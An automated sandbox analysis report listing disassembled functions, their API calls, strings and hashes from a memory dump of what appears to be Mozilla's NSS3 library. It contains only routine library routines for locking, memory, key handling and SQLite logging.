free.MOZGLUE(?), ref: 6C59CDE9

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
String ID:
API String ID: 1720798025-0
Opcode ID: c39a7a4a615dabb40db89a2659da92e3768dd150db72613972a476917b03efcb
Instruction ID: 4c6da58b8cd10bab52e6e97755331c0742799e22f716fc9bda966831249c28a1
Opcode Fuzzy Hash: c39a7a4a615dabb40db89a2659da92e3768dd150db72613972a476917b03efcb
Instruction Fuzzy Hash: 6811C2B2B01251BBDF00AFA6EC85D96BB6CFF44258B140161E90A97E11E732F934C7E1

Function 6C602CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C605B40: PR_GetIdentitiesLayer.NSS3 ref: 6C605B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C602CEC

Part of subcall function 6C61C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C61C2BF

PR_EnterMonitor.NSS3(?), ref: 6C602D02
PR_EnterMonitor.NSS3(?), ref: 6C602D1F
PR_ExitMonitor.NSS3(?), ref: 6C602D42
PR_ExitMonitor.NSS3(?), ref: 6C602D5B

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction ID: d05d9576bb5a39a91749dfc0cd2de44ba9f927853c6dbeebcb9fc196fc8ad220
Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction Fuzzy Hash: 3001A1B1A002006BE7309E29FD44BC7B7A5EF4631CF005525E85E96B20E732F819CA9A

Function 6C602D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C605B40: PR_GetIdentitiesLayer.NSS3 ref: 6C605B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C602D9C

Part of subcall function 6C61C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C61C2BF

PR_EnterMonitor.NSS3(?), ref: 6C602DB2
PR_EnterMonitor.NSS3(?), ref: 6C602DCF
PR_ExitMonitor.NSS3(?), ref: 6C602DF2
PR_ExitMonitor.NSS3(?), ref: 6C602E0B

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction ID: bdd72f3bccfd6628a3c26cb1caecbb1237818a9bf90d5d1567d28ba2a4344038
Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
Instruction Fuzzy Hash: 6B01A5B1A402005BE7309E25FD05BC7B7A5EF4231CF001435E85D96B21D732F815CA9E

Function 6C59AE30 Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 6C583090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C59AE42), ref: 6C5830AA
Part of subcall function 6C583090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C5830C7
Part of subcall function 6C583090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C5830E5
Part of subcall function 6C583090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C583116
Part of subcall function 6C583090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C58312B
Part of subcall function 6C583090: PK11_DestroyObject.NSS3(?,?), ref: 6C583154
Part of subcall function 6C583090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C58317E

SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6C5799FF,?,?,?,?,?,?,?,?,?,6C572D6B,?), ref: 6C59AE67
SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6C5799FF,?,?,?,?,?,?,?,?,?,6C572D6B,?), ref: 6C59AE7E
SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C572D6B,?,?,00000000), ref: 6C59AE89
PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6C572D6B,?,?,00000000), ref: 6C59AE96
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6C572D6B,?,?), ref: 6C59AEA3

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
String ID:
API String ID: 754562246-0
Opcode ID: 6a97b461ff99679d2408498a55f089b77db7bbcb2ab878d9b3c647edf3daadaa
Instruction ID: 2bedad4d60e73bb3a28c70e54b15b49cda0a6718ef2bd9196b41d6b77ddc2c80
Opcode Fuzzy Hash: 6a97b461ff99679d2408498a55f089b77db7bbcb2ab878d9b3c647edf3daadaa
Instruction Fuzzy Hash: 7601C876F050A097E701D26DAC85AAF3598CBC765CF0804B1E909D7B01F615DD0942F3

Function 6C68BDB0 Relevance: 7.6, APIs: 5, Instructions: 51COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,6C687AFE,?,?,?,?,?,?,?,?,6C68798A), ref: 6C68BDC3
free.MOZGLUE(?,?,6C687AFE,?,?,?,?,?,?,?,?,6C68798A), ref: 6C68BDCA
PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C687AFE,?,?,?,?,?,?,?,?,6C68798A), ref: 6C68BDE9
free.MOZGLUE(?,00000000,00000000,?,6C687AFE,?,?,?,?,?,?,?,?,6C68798A), ref: 6C68BE21
free.MOZGLUE(00000000,00000000,?,6C687AFE,?,?,?,?,?,?,?,?,6C68798A), ref: 6C68BE32

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: free$CriticalDeleteDestroyMonitorSection
String ID:
API String ID: 3662805584-0
Opcode ID: 7ed5b777d5ca7b43d0cfdbc93885dd5b7441ec2f15fc660f7d83e0078431df19
Instruction ID: 0cac26e6d8615ce2e01d644502e9c6f7b979cf92de0ca15c210639f8cc1875fa
Opcode Fuzzy Hash: 7ed5b777d5ca7b43d0cfdbc93885dd5b7441ec2f15fc660f7d83e0078431df19
Instruction Fuzzy Hash: F311DAB5B012019FDF10DF6BD88DB463BB5AB4A354F580069D50A87710E732BD15CBA9

Function 6C687C60 Relevance: 7.5, APIs: 5, Instructions: 40stringthreadCOMMON

Download Yara Rule

APIs

PR_Free.NSS3(?), ref: 6C687C73
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C687C83
malloc.MOZGLUE(00000001), ref: 6C687C8D
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C687C9F
PR_GetCurrentThread.NSS3 ref: 6C687CAD

Part of subcall function 6C639BF0: TlsGetValue.KERNEL32(?,?,?,6C680A75), ref: 6C639C07

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: CurrentFreeThreadValuemallocstrcpystrlen
String ID:
API String ID: 105370314-0
Opcode ID: f9cc429542d046ef51af4a21723796eab1f94c32eccb07e674753c1d444cb4d2
Instruction ID: 45dda7a91ac227207ce070747fdbd990de50b8543d356c1f723cd6b2dd002099
Opcode Fuzzy Hash: f9cc429542d046ef51af4a21723796eab1f94c32eccb07e674753c1d444cb4d2
Instruction Fuzzy Hash: 80F0C2F1A112167FEB009F7A9C099477798EF05369B018435E80EC3B00EB31E114CAED

Function 6C68ADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(6C68A6D8), ref: 6C68AE0D
free.MOZGLUE(?), ref: 6C68AE14
DeleteCriticalSection.KERNEL32(6C68A6D8), ref: 6C68AE36
free.MOZGLUE(?), ref: 6C68AE3D
free.MOZGLUE(00000000,00000000,?,?,6C68A6D8), ref: 6C68AE47

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: free$CriticalDeleteSection
String ID:
API String ID: 682657753-0
Opcode ID: 3eeac5bd8d44c7143d004e1bdd8489b47219722bc84b5a18815f15b8a73ea7d3
Instruction ID: 099ff0e427caa7674cdbda3a652ec7b4b1470c1f2c5e95f5f2b13366ce601ed7
Opcode Fuzzy Hash: 3eeac5bd8d44c7143d004e1bdd8489b47219722bc84b5a18815f15b8a73ea7d3
Instruction Fuzzy Hash: F1F0F675202A02B7CB109FAAD84C9177778BF86774B100329F52B83981D732E213D7E9

Function 6C50BCD0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 190COMMON

Download Yara Rule

APIs

sqlite3_mprintf.NSS3(6C6AAAF9,?), ref: 6C50BE37

Strings

Phl, xrefs: 6C50BED4
winFileSize, xrefs: 6C50BF07
hl, xrefs: 6C50BDD7

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: sqlite3_mprintf
String ID: hl$Phl$winFileSize
API String ID: 4246442610-2312415256
Opcode ID: 6f7719aa23300d4f65a5103876c4f0da7282f6e6982ad34727463a4e51c65169
Instruction ID: a0c03453a2340151e35ada4dc6c5b00f61b64a4e5a828d9fc99824b6fe0efa8b
Opcode Fuzzy Hash: 6f7719aa23300d4f65a5103876c4f0da7282f6e6982ad34727463a4e51c65169
Instruction Fuzzy Hash: 16618C32B04606DBDB04DF29C8D0BA9B7B1FF8A314B048A65D815CBB40D730E956CBD5

Function 6C517C40 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 100COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A0D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C517D35

Strings

database corruption, xrefs: 6C517D29
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C517D13, 6C517D1F, 6C517D47, 6C517D53, 6C517D5F
%s at line %d of [%.10s], xrefs: 6C517D2E

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: 6279c849dcd1fbe3a50d17ba2f571c30fdde6d2622cbcc3a9a3e9dff8d05fbfa
Instruction ID: 39b46fec7eddc6487ce8f0a071ccfaa8fbf5ea3d5d77928e17137366e8edb9bb
Opcode Fuzzy Hash: 6279c849dcd1fbe3a50d17ba2f571c30fdde6d2622cbcc3a9a3e9dff8d05fbfa
Instruction Fuzzy Hash: A0312631E0822997D710CF9ECC849BEB7F1AF84349B590596F444B7B81D270E852CBA4

Function 6C506C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6C506D36

Strings

database corruption, xrefs: 6C506D2A
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C506D20
%s at line %d of [%.10s], xrefs: 6C506D2F

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 632333372-598938438
Opcode ID: f33002e0183271df2abb55e85e38c9391106750fd7a734315be510936d149870
Instruction ID: 095e7dbbde565260d2fb452c9f8477ca4b3ccd6c2157a800b45e9426aef58859
Opcode Fuzzy Hash: f33002e0183271df2abb55e85e38c9391106750fd7a734315be510936d149870
Instruction Fuzzy Hash: 2121DE727043059BD710CE1AC841B5AB7E2AF84308F54892CDC59DBB51EB71E989CB92

Function 6C5E2FD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,-000000D4,00000000,?,<+^l,6C5E32C2,<+^l,00000000,00000000,?), ref: 6C5E2FDA

Part of subcall function 6C5D14C0: TlsGetValue.KERNEL32 ref: 6C5D14E0
Part of subcall function 6C5D14C0: EnterCriticalSection.KERNEL32 ref: 6C5D14F5
Part of subcall function 6C5D14C0: PR_Unlock.NSS3 ref: 6C5D150D

PORT_ArenaAlloc_Util.NSS3(?,-00000007), ref: 6C5E300B

Part of subcall function 6C5D10C0: TlsGetValue.KERNEL32(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D10F3
Part of subcall function 6C5D10C0: EnterCriticalSection.KERNEL32(?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D110C
Part of subcall function 6C5D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D1141
Part of subcall function 6C5D10C0: PR_Unlock.NSS3(?,?,?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D1182
Part of subcall function 6C5D10C0: TlsGetValue.KERNEL32(?,6C578802,00000000,00000008,?,6C56EF74,00000000), ref: 6C5D119C

SECOID_FindOIDByTag_Util.NSS3(00000010), ref: 6C5E302A

Part of subcall function 6C5D0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C5D08B4

Part of subcall function 6C5BC3D0: PK11_ImportPublicKey.NSS3(?,?,00000000), ref: 6C5BC45D
Part of subcall function 6C5BC3D0: TlsGetValue.KERNEL32 ref: 6C5BC494
Part of subcall function 6C5BC3D0: EnterCriticalSection.KERNEL32(?), ref: 6C5BC4A9
Part of subcall function 6C5BC3D0: PR_Unlock.NSS3(?), ref: 6C5BC4F4

Strings

<+^l, xrefs: 6C5E2FD0

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: Value$ArenaCriticalEnterSectionUnlockUtil$Alloc_AllocateErrorFindImportK11_Mark_PublicTag_
String ID: <+^l
API String ID: 2538134263-3483200685
Opcode ID: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
Instruction ID: 1c5eabff70d6a10beca106ac10d878c064cef90160a63060b8d3c26243d672b6
Opcode Fuzzy Hash: 595581cd8a3e58213a728435827faa4a7978b5385ddb469e9c4028bda8901334
Instruction Fuzzy Hash: 5411E7B6B00204ABDB009E69DC01A9B77DA9BC4278F194134E81CD7791E772ED15C7A1

Function 6C63CC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6C63CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C63CC7B), ref: 6C63CD7A
Part of subcall function 6C63CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C63CD8E
Part of subcall function 6C63CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C63CDA5
Part of subcall function 6C63CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C63CDB8

PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6C63CCB5
memcpy.VCRUNTIME140(6C6D14F4,6C6D02AC,00000090), ref: 6C63CCD3
memcpy.VCRUNTIME140(6C6D1588,6C6D02AC,00000090), ref: 6C63CD2B

Part of subcall function 6C559AC0: socket.WSOCK32(?,00000017,6C5599BE), ref: 6C559AE6
Part of subcall function 6C559AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6C5599BE), ref: 6C559AFC

Part of subcall function 6C560590: closesocket.WSOCK32(6C559A8F,?,?,6C559A8F,00000000), ref: 6C560597

Strings

Ipv6_to_Ipv4 layer, xrefs: 6C63CCB0

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
String ID: Ipv6_to_Ipv4 layer
API String ID: 1231378898-412307543
Opcode ID: d625b827ee0c9a9987cc5abeff31ab3b87e88b2068e310c7ad829ee523de1288
Instruction ID: dc65fa9316621600009943f8b6303b52ee7a52c642dd451a1f0a92b76d8f5e35
Opcode Fuzzy Hash: d625b827ee0c9a9987cc5abeff31ab3b87e88b2068e310c7ad829ee523de1288
Instruction Fuzzy Hash: 251184F5B112509EDB009F5B9C867423BF89786728F142129F51ACBB41E7B5E4048BED

Function 6C588850 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000028,00000000,?,?,6C590715), ref: 6C588859
PR_NewLock.NSS3 ref: 6C588874

Part of subcall function 6C6398D0: calloc.MOZGLUE(00000001,00000084,6C560936,00000001,?,6C56102C), ref: 6C6398E5

PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6C58888D

Strings

NSS, xrefs: 6C588887

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4f0000_file.jbxd

Similarity

API ID: calloc$ArenaInitLockPool
String ID: NSS
API String ID: 2230817933-3870390017
Opcode ID: 67fee78f59f34af65d2adbb74fcd64956b3ef6323c499da8d8456e3c0382618f
Instruction ID: 6c7b35d5e9aea66aa9e96673a144d4d2693d8a9445d06e8c3c9fbefa010342da
Opcode Fuzzy Hash: 67fee78f59f34af65d2adbb74fcd64956b3ef6323c499da8d8456e3c0382618f
Instruction Fuzzy Hash: 52F09676E8263073F31011696C06F8675989F9175EF440832E90DA7B82EE51991987E7

Function 6C63B860 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 41COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000116BB,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,6C62A4E2), ref: 6C63B8C6

Strings

database corruption, xrefs: 6C63B8BA
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C63B8B0
%s at line %d of [%.10s], xrefs: 6C63B8BF

Memory Dump Source

Source File: 00000000.00000002.2157463583.000000006C4F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C4F0000, based on PE: true

Associated: 00000000.00000002.2157445617.000000006C4F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157622413.000000006C6CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157641193.000000006C6CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2157659910.000000006C6D0000.00000004.00000001.01000000.00000009.sdmpDownload File
